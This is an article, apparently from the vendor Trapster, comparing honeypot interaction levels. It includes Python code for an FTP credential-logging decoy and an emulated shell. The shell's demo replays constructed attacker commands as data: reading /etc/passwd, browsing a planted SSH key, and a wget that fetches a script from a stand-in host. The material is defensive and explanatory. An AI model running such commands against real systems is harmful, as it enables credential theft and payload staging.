High-interaction vs low-interaction honeypot
Not all honeypots are created equal. The level of interaction a honeypot offers an attacker directly shapes the richness of the intelligence it yields, but also the risk, the operational cost and how easily an adversary can spot it. Distinguishing low, medium and high interaction is essential to design a coherent and controlled deceptive security strategy.
Low interaction: simple, safe, deployable at scale
A low-interaction honeypot emulates a limited set of services and responses without running a real operating system or a fully functional application. It might present an SSH banner, an open SMB port or a login page, but it never lets the attacker obtain a real shell or execute arbitrary code. The interaction is confined to the earliest phases of an intrusion: scanning, enumeration and authentication attempts.
That simplicity is exactly its strength. Because the exposed attack surface is minimal, the risk that an adversary actually takes over the decoy and uses it as a pivot into the rest of the network is very low. Maintenance is light and deployment can be large-scale and automated: you scatter dozens or even hundreds of sensors across an environment to catch any scan or lateral movement as early as possible.
- Low cost and resource footprint, ideal for broad coverage.
- Reduced operational risk: there is no real system to compromise.
- Intelligence limited to the initial phases (scans, attempted credentials, scanner and client fingerprints).
- An excellent source of high-value alerts with very few false positives, since any contact is suspicious by design.
The trade-off is twofold. First, the intelligence stays shallow: you observe intent, but rarely the tools, payloads or post-exploitation techniques. Second, a skilled attacker often detects the emulation, because the responses lack depth, the emulated protocol or TCP/IP stack leaves fingerprintable artifacts (a banner with no matching behaviour, identical replies to every request, missing options a real implementation would negotiate), and the behaviour diverges from that of a genuine service.
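To make the low-interaction model concrete, here is a minimal FTP decoy written for this article (an added example, not Trapster's code). It presents a banner, accepts USER and PASS so it can record the credentials tried, refuses every login and every other command, and cuts the session after a fixed number of commands; it never executes anything on behalf of the client. The banner text, the command cap, the listening port and the transcript it replays are assumptions chosen for the example.

```python
import asyncio
import json
import sys
import time

# Assumed banner text; a real deployment picks one matching the surrounding environment.
BANNER = "220 ProFTPD Server ready."
MAX_COMMANDS = 8  # hard cap on interaction depth per session


def make_alert(peer, kind, **fields):
    """Structured alert record; any contact with a decoy is suspicious by design."""
    alert = {"ts": time.time(), "src": peer, "event": kind}
    alert.update(fields)
    return alert


class FtpDecoy:
    """State for one session. Pure logic, so it can be driven offline in tests."""

    def __init__(self, peer):
        self.peer = peer
        self.user = None
        self.count = 0
        self.alerts = [make_alert(peer, "connect")]

    def feed(self, line):
        """Handle one client command line; return (reply, close_connection)."""
        self.count += 1
        if self.count > MAX_COMMANDS:
            self.alerts.append(make_alert(self.peer, "interaction_cap"))
            return "421 Service not available, closing control connection.", True
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            self.user = arg
            return "331 Password required for %s" % arg, False
        if verb == "PASS":
            # The credential is the intelligence: record it, then reject it.
            self.alerts.append(make_alert(self.peer, "credential", user=self.user, password=arg))
            self.user = None
            return "530 Login incorrect.", False
        if verb == "QUIT":
            return "221 Goodbye.", True
        # Every other verb is logged as enumeration and refused; nothing is executed.
        self.alerts.append(make_alert(self.peer, "command", verb=verb, arg=arg))
        return "530 Please login with USER and PASS.", False


def run_session(peer, lines):
    """Drive one decoy through a list of command lines (offline use and tests)."""
    decoy = FtpDecoy(peer)
    replies = [BANNER]
    for line in lines:
        reply, close = decoy.feed(line)
        replies.append(reply)
        if close:
            break
    return replies, decoy.alerts


async def serve_client(reader, writer):
    """asyncio handler for one TCP connection; same logic as run_session."""
    peer = writer.get_extra_info("peername")[0]
    decoy = FtpDecoy(peer)
    writer.write((BANNER + "\r\n").encode())
    try:
        while True:
            raw = await asyncio.wait_for(reader.readline(), timeout=30)
            if not raw:
                break
            reply, close = decoy.feed(raw.decode("latin-1"))
            writer.write((reply + "\r\n").encode())
            await writer.drain()
            if close:
                break
    except (asyncio.TimeoutError, ConnectionError):
        pass
    finally:
        writer.close()
        for alert in decoy.alerts:  # in production: ship to the SIEM instead of stdout
            print(json.dumps(alert))


async def serve(host="127.0.0.1", port=2121):
    server = await asyncio.start_server(serve_client, host, port)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    if "--serve" in sys.argv:
        asyncio.run(serve())
    else:
        # Constructed transcript standing in for a brute-force attempt against the decoy.
        replies, alerts = run_session("203.0.113.5", ["USER admin", "PASS admin123", "SYST", "QUIT"])
        for r in replies:
            print("S:", r)
        for a in alerts:
            print(json.dumps(a))
```

Run it without arguments to replay the constructed transcript, or with `--serve` to listen on 127.0.0.1:2121 and try it with any FTP client. Note what the sensor gives you and what it does not: the source, the client's command sequence and the credentials it tried, but no shell and no payload, which is exactly the "shallow but safe" profile described above.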
High interaction: maximal realism, rich intelligence, high risk
A high-interaction honeypot exposes a real, fully fledged operating system and services. The attacker can authenticate, obtain a shell, drop files, run binaries and try to progress just as on a legitimate target. Because nothing is emulated, the decoy is extremely hard to tell apart from a production asset at the service level; what can still give it away is its surroundings, such as virtualization or monitoring artifacts and the absence of genuine users and traffic.
This is the most valuable source of intelligence available. You capture the entire attack chain: the exploits used, privilege escalation, dropped tooling, the command-and-control infrastructure contacted, and the adversary's tactics and procedures. This data feeds threat intelligence directly and supports the authoring of reliable detection rules.
- Deep, comprehensive intelligence on the attacker's real behaviour.
- Very low detectability: the system's realism fools even seasoned adversaries.
- Major risk: a genuinely compromised system can serve as a springboard into the network.
- High cost in isolation, monitoring, maintenance and post-compromise restoration.
That realism demands strict operational discipline. A high-interaction honeypot must be rigorously contained, through network segmentation, egress filtering and instrumentation, so that a compromise never becomes an entry point into production assets and the decoy cannot be turned against third parties once it is under the attacker's control. Without this isolation, the decoy becomes a liability rather than an asset.
Medium interaction and choosing a strategy
Between the two sits medium interaction. These honeypots emulate services with more application logic than low interaction, such as a convincingly simulated command interpreter or a fake file system, without exposing a real operating system. They offer better realism and richer intelligence while retaining part of the safety of emulation, at the price of greater complexity: the emulator is still fingerprintable where its behaviour departs from the real thing, and any parsing bug in it is attack surface of its own.
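A medium-interaction decoy of the kind described above, as an added example rather than Trapster's code: a fake Linux command interpreter in Python that parses what the attacker types, answers from a canned file system and identity, records file reads and download attempts, and executes nothing on the host. The hostname, user, kernel string and file contents (including the planted private key) are constructed for the example.

```python
import posixpath
import shlex

# Constructed fake file system: a few paths and their contents. Nothing here is
# read from, or written to, the real host.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "deploy:x:1001:1001::/home/deploy:/bin/bash\n",
    "/etc/hostname": "web-prod-02\n",
    "/home/deploy/.bash_history": "cd /var/www\nsudo systemctl restart nginx\n",
    "/home/deploy/.ssh/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nEXAMPLE-HONEYTOKEN\n",
}
FAKE_USER = "deploy"  # assumed identity of the decoy
FAKE_UNAME = "Linux web-prod-02 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux"


def _directories():
    """Directories implied by the file paths in FAKE_FS."""
    dirs = {"/"}
    for path in FAKE_FS:
        parent = posixpath.dirname(path)
        while parent != "/":
            dirs.add(parent)
            parent = posixpath.dirname(parent)
    return dirs


class FakeShell:
    """Emulated interpreter: parses input, answers from canned state, records everything."""

    def __init__(self):
        self.cwd = "/home/" + FAKE_USER
        self.dirs = _directories()
        self.events = []  # (value, kind) tuples for the alert pipeline

    def _resolve(self, path):
        if not path.startswith("/"):
            path = posixpath.join(self.cwd, path)
        return posixpath.normpath(path)

    def run(self, cmdline):
        """Handle one command line and return the text the attacker would see."""
        self.events.append((cmdline, "input"))
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            return "-bash: syntax error: unexpected end of file\n"
        if not argv:
            return ""
        handler = getattr(self, "cmd_" + argv[0], None)
        if handler is None:
            # Unknown or unimplemented: refuse instead of falling through to a real shell.
            return "-bash: %s: command not found\n" % argv[0]
        return handler([a for a in argv[1:] if not a.startswith("-")], argv[1:])

    def cmd_whoami(self, paths, args):
        return FAKE_USER + "\n"

    def cmd_pwd(self, paths, args):
        return self.cwd + "\n"

    def cmd_uname(self, paths, args):
        return (FAKE_UNAME if "-a" in args else "Linux") + "\n"

    def cmd_cd(self, paths, args):
        target = self._resolve(paths[0]) if paths else "/home/" + FAKE_USER
        if target not in self.dirs:
            return "-bash: cd: %s: No such file or directory\n" % paths[0]
        self.cwd = target
        return ""

    def cmd_ls(self, paths, args):
        target = self._resolve(paths[0]) if paths else self.cwd
        if target in FAKE_FS:
            return target + "\n"
        if target not in self.dirs:
            return "ls: cannot access '%s': No such file or directory\n" % paths[0]
        names = sorted(posixpath.basename(p) for p in list(FAKE_FS) + sorted(self.dirs)
                       if p != "/" and posixpath.dirname(p) == target)
        return "".join(n + "\n" for n in names)

    def cmd_cat(self, paths, args):
        out = []
        for a in paths:
            path = self._resolve(a)
            if path in FAKE_FS:
                self.events.append((path, "file_read"))  # which honeytoken was taken
                out.append(FAKE_FS[path])
            else:
                out.append("cat: %s: No such file or directory\n" % a)
        return "".join(out)

    def cmd_wget(self, paths, args):
        # Payload staging is the most valuable observable: keep the URL, fetch nothing.
        urls = [a for a in args if a.startswith(("http://", "https://"))]
        for url in urls:
            self.events.append((url, "download_attempt"))
        return "".join("Connecting to %s... failed: Connection refused.\n" % u for u in urls)

    cmd_curl = cmd_wget


if __name__ == "__main__":
    sh = FakeShell()
    # Constructed session standing in for a post-login reconnaissance sequence.
    for cmd in ["whoami", "uname -a", "cat /etc/passwd", "cd .ssh", "ls", "wget http://198.51.100.7/x.sh"]:
        print("$ " + cmd)
        print(sh.run(cmd), end="")
    print(sh.events)
```

The value over the low-interaction sensor is in `events`: which files the attacker read (a read of the planted key is a usable alert on its own) and which URL the payload would have come from. The cost is visible in the same code: every command not implemented returns "command not found", which is exactly the kind of divergence an experienced operator probes for.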
The right choice depends on the objective. For early detection and broad, low-risk coverage, favour low interaction and complement it with decoys and breadcrumbs spread across the environment. For research, analysis of targeted campaigns or the production of detailed intelligence, high interaction is the way to go, provided you have the isolation and monitoring resources it requires. Most mature deceptive security programs combine both levels to pair breadth of detection with depth of analysis, leveraging the near-absence of false positives inherent to any well-designed honeypot; in practice that means excluding your own vulnerability scanners and monitoring tools from the decoys, since they are the one source of legitimate contact.
With Trapster
Trapster favours an approach built on safe, easy-to-deploy decoys and sensors that scale broadly, generating high-value alerts without the operational risk of a genuinely compromised system.
From theory to detection
See how Trapster deploys honeypots, decoys and honeytokens across your network to turn every suspicious interaction into a reliable alert.
30-min demo, no commitment · Hosted in France